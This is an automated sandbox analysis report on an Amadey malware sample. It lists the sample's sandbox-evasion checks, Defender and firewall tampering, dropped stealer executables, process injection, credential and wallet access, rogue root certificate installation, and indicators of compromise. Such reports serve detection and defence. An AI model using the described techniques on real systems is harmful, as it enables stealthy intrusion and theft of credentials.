amadey | e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9

Virtualization/Sandbox Evasion

Processes:

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exeaxplont.exeaxplont.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

5176 powershell.exe
5140 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

4832 netsh.exe
5228 netsh.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
5176	powershell.exe
5140	powershell.exe

pid	process
4832	netsh.exe
5228	netsh.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

axplont.exee51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exeaxplont.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Newoff.exeinstall.exee51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exeRegAsm.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Newoff.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	axplont.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	RegAsm.exe

Executes dropped EXE 37 IoCs

Processes:

axplont.exebuildjudit.exe33333.exefileosn.exesvhoost.exeOne.exelumma1234.exeNewoff.exegold.exetoolspub1.exeswizzzz.exeaxplont.exeFirstZ.exeinstall.exeNewoff.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exe698247.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exePiercingNetLink.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLinks.exe506308.exereakuqnanrkn.exeaxplont.exeNewoff.exe

pid	process
3224	axplont.exe
4688	buildjudit.exe
2256	33333.exe
4048	fileosn.exe
2400	svhoost.exe
2208	One.exe
2440	lumma1234.exe
5088	Newoff.exe
4168	gold.exe
2160	toolspub1.exe
4088	swizzzz.exe
4016	axplont.exe
1376	FirstZ.exe
2212	install.exe
3492	Newoff.exe
5184	GameService.exe
5228	GameService.exe
5248	GameService.exe
5276	GameService.exe
5296	GameService.exe
5408	GameSyncLink.exe
5496	698247.exe
6084	GameService.exe
5224	GameService.exe
5252	GameService.exe
1228	GameService.exe
2772	GameService.exe
3912	PiercingNetLink.exe
5808	GameService.exe
5872	GameService.exe
5292	GameService.exe
5832	GameService.exe
5980	GameSyncLinks.exe
5012	506308.exe
5872	reakuqnanrkn.exe
656	axplont.exe
4812	Newoff.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

axplont.exee51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exeaxplont.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	axplont.exe
Key opened	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine	axplont.exe

Loads dropped DLL 3 IoCs

Processes:

698247.exeRegAsm.exe

pid process

5496 698247.exe
4932 RegAsm.exe
4932 RegAsm.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
5496	698247.exe
4932	RegAsm.exe
4932	RegAsm.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1028-555-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-558-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-561-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-564-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-565-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-563-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-562-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-559-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-557-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-554-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-556-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-553-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1028-566-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

123 pastebin.com
39 raw.githubusercontent.com
40 raw.githubusercontent.com
122 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

37 ip-api.com

flow	ioc
123	pastebin.com
39	raw.githubusercontent.com
40	raw.githubusercontent.com
122	pastebin.com

flow	ioc
37	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

reakuqnanrkn.exeFirstZ.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exeaxplont.exeaxplont.exe

pid process

60 e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
3224 axplont.exe
4016 axplont.exe
656 axplont.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

33333.exelumma1234.exegold.exeswizzzz.exereakuqnanrkn.exe

description	pid	process	target process
PID 2256 set thread context of 404	2256	33333.exe	RegAsm.exe
PID 2440 set thread context of 4016	2440	lumma1234.exe	axplont.exe
PID 4168 set thread context of 1376	4168	gold.exe	FirstZ.exe
PID 4088 set thread context of 4932	4088	swizzzz.exe	RegAsm.exe
PID 5872 set thread context of 5568	5872	reakuqnanrkn.exe	conhost.exe
PID 5872 set thread context of 1028	5872	reakuqnanrkn.exe	explorer.exe

Drops file in Program Files directory 15 IoCs

Processes:

install.exeGameSyncLinks.exe

description	ioc	process
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe

Drops file in Windows directory 1 IoCs

Processes:

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe

description ioc process

File created C:\Windows\Tasks\axplont.job e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe

description	ioc	process
File created	C:\Windows\Tasks\axplont.job	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
5168	sc.exe
5512	sc.exe
4512	sc.exe
3936	sc.exe
6072	sc.exe
5768	sc.exe
1208	sc.exe
3288	sc.exe
2044	sc.exe
1920	sc.exe
5596	sc.exe
5656	sc.exe
5788	sc.exe
2544	sc.exe
5776	sc.exe
5212	sc.exe
5132	sc.exe
5176	sc.exe
5688	sc.exe
5844	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4232 2256 WerFault.exe 33333.exe
3528 2160 WerFault.exe toolspub1.exe

pid	pid_target	process	target process
4232	2256	WerFault.exe	33333.exe
3528	2160	WerFault.exe	toolspub1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

toolspub1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.

Data from Local System
T1005

Processes:

WMIC.exe

pid process

5580 WMIC.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

836 schtasks.exe
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

8 tasklist.exe
3244 tasklist.exe
5832 tasklist.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeNETSTAT.EXE

pid process

5944 ipconfig.exe
6128 NETSTAT.EXE
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4812 systeminfo.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3164 taskkill.exe

pid	process
5580	WMIC.exe

pid	process
836	schtasks.exe

pid	process
8	tasklist.exe
3244	tasklist.exe
5832	tasklist.exe

pid	process
5944	ipconfig.exe
6128	NETSTAT.EXE

pid	process
4812	systeminfo.exe

pid	process
3164	taskkill.exe

Modifies data under HKEY_USERS 50 IoCs

Processes:

powershell.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

fileosn.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	fileosn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	fileosn.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exepowershell.exeRegAsm.exeOne.exeaxplont.exesvhoost.exefileosn.exeFirstZ.exepowershell.exereakuqnanrkn.exepowershell.exeexplorer.exe

pid	process
60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe
3224	axplont.exe
3224	axplont.exe
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe
4932	RegAsm.exe
4932	RegAsm.exe
2208	One.exe
2208	One.exe
4016	axplont.exe
4016	axplont.exe
4932	RegAsm.exe
4932	RegAsm.exe
2400	svhoost.exe
2400	svhoost.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
4048	fileosn.exe
2400	svhoost.exe
2400	svhoost.exe
2400	svhoost.exe
2400	svhoost.exe
1376	FirstZ.exe
5176	powershell.exe
5176	powershell.exe
5176	powershell.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
1376	FirstZ.exe
5872	reakuqnanrkn.exe
5140	powershell.exe
5140	powershell.exe
5140	powershell.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
5872	reakuqnanrkn.exe
1028	explorer.exe
1028	explorer.exe
1028	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exetasklist.exetaskkill.exeOne.exetasklist.exepowershell.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2352	WMIC.exe
Token: SeSecurityPrivilege	2352	WMIC.exe
Token: SeTakeOwnershipPrivilege	2352	WMIC.exe
Token: SeLoadDriverPrivilege	2352	WMIC.exe
Token: SeSystemProfilePrivilege	2352	WMIC.exe
Token: SeSystemtimePrivilege	2352	WMIC.exe
Token: SeProfSingleProcessPrivilege	2352	WMIC.exe
Token: SeIncBasePriorityPrivilege	2352	WMIC.exe
Token: SeCreatePagefilePrivilege	2352	WMIC.exe
Token: SeBackupPrivilege	2352	WMIC.exe
Token: SeRestorePrivilege	2352	WMIC.exe
Token: SeShutdownPrivilege	2352	WMIC.exe
Token: SeDebugPrivilege	2352	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2352	WMIC.exe
Token: SeRemoteShutdownPrivilege	2352	WMIC.exe
Token: SeUndockPrivilege	2352	WMIC.exe
Token: SeManageVolumePrivilege	2352	WMIC.exe
Token: 33	2352	WMIC.exe
Token: 34	2352	WMIC.exe
Token: 35	2352	WMIC.exe
Token: 36	2352	WMIC.exe
Token: SeDebugPrivilege	8	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2352	WMIC.exe
Token: SeSecurityPrivilege	2352	WMIC.exe
Token: SeTakeOwnershipPrivilege	2352	WMIC.exe
Token: SeLoadDriverPrivilege	2352	WMIC.exe
Token: SeSystemProfilePrivilege	2352	WMIC.exe
Token: SeSystemtimePrivilege	2352	WMIC.exe
Token: SeProfSingleProcessPrivilege	2352	WMIC.exe
Token: SeIncBasePriorityPrivilege	2352	WMIC.exe
Token: SeCreatePagefilePrivilege	2352	WMIC.exe
Token: SeBackupPrivilege	2352	WMIC.exe
Token: SeRestorePrivilege	2352	WMIC.exe
Token: SeShutdownPrivilege	2352	WMIC.exe
Token: SeDebugPrivilege	2352	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2352	WMIC.exe
Token: SeRemoteShutdownPrivilege	2352	WMIC.exe
Token: SeUndockPrivilege	2352	WMIC.exe
Token: SeManageVolumePrivilege	2352	WMIC.exe
Token: 33	2352	WMIC.exe
Token: 34	2352	WMIC.exe
Token: 35	2352	WMIC.exe
Token: 36	2352	WMIC.exe
Token: SeDebugPrivilege	3164	taskkill.exe
Token: SeDebugPrivilege	2208	One.exe
Token: SeBackupPrivilege	2208	One.exe
Token: SeDebugPrivilege	3244	tasklist.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeSecurityPrivilege	2208	One.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeIncreaseQuotaPrivilege	5580	WMIC.exe
Token: SeSecurityPrivilege	5580	WMIC.exe
Token: SeTakeOwnershipPrivilege	5580	WMIC.exe
Token: SeLoadDriverPrivilege	5580	WMIC.exe
Token: SeSystemProfilePrivilege	5580	WMIC.exe
Token: SeSystemtimePrivilege	5580	WMIC.exe
Token: SeProfSingleProcessPrivilege	5580	WMIC.exe
Token: SeIncBasePriorityPrivilege	5580	WMIC.exe
Token: SeCreatePagefilePrivilege	5580	WMIC.exe
Token: SeBackupPrivilege	5580	WMIC.exe
Token: SeRestorePrivilege	5580	WMIC.exe
Token: SeShutdownPrivilege	5580	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

506308.exe

pid process

5012 506308.exe

pid	process
5012	506308.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exeaxplont.exestub.execmd.execmd.execmd.exe33333.execmd.exeRegAsm.execmd.execmd.exe

description	pid	process	target process
PID 60 wrote to memory of 3224	60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe	axplont.exe
PID 60 wrote to memory of 3224	60	e51341e448dd867dbd5153d8ae922ccee00783e673c55b1d32cedff62ed897b9.exe	axplont.exe
